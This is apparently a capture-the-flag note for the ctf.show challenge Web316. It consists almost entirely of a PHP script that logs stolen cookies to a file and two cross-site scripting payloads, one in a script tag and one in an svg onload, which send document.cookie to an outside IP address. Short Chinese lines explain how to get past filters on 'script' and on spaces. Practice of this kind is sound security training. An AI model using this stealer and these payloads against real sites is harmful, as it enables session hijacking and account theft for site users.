<?php
$cookie = $_GET['cookie'];
$time = date('Y-m-d h:i:s', time());
$log = fopen("cookie.txt", "a");
fwrite($log,$time.': '. $cookie . "\n");
fclose($log);
?>//靶场:https://ctf.show/challenges Web316--
payload:
<script>location.href="http://47.93.79.131/flag.php?cookie="+document.cookie</script>
<svg onload="location.href='http://47.93.79.131/flag.php?cookie='+document.cookie"/>
script 被过滤就用 svg
空格 被过滤就用 / 替代